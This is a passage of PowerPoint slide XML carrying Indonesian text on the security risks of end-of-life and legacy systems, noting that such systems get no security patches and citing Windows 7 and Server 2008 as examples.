            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (EOL) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman, vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinyatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditinggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status EOL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vendornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows 7 dan Server 2008, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Januari 2020. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
